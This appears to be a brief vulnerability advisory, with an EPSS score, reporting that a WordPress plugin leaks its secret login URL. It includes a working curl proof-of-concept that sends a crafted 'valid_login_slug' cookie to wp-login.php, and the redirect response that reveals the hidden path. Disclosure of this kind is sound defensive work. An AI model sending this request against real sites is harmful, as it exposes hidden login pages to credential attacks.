0.002 Low
EPSS
Percentile
52.8%
The plugin leaks the secret login URL when sending a specific crafted request
curl -sIXGET -H "Cookie: valid_login_slug=1" https://example.com/wp-login.php HTTP/2 302 x-redirect-by: WordPress location: secret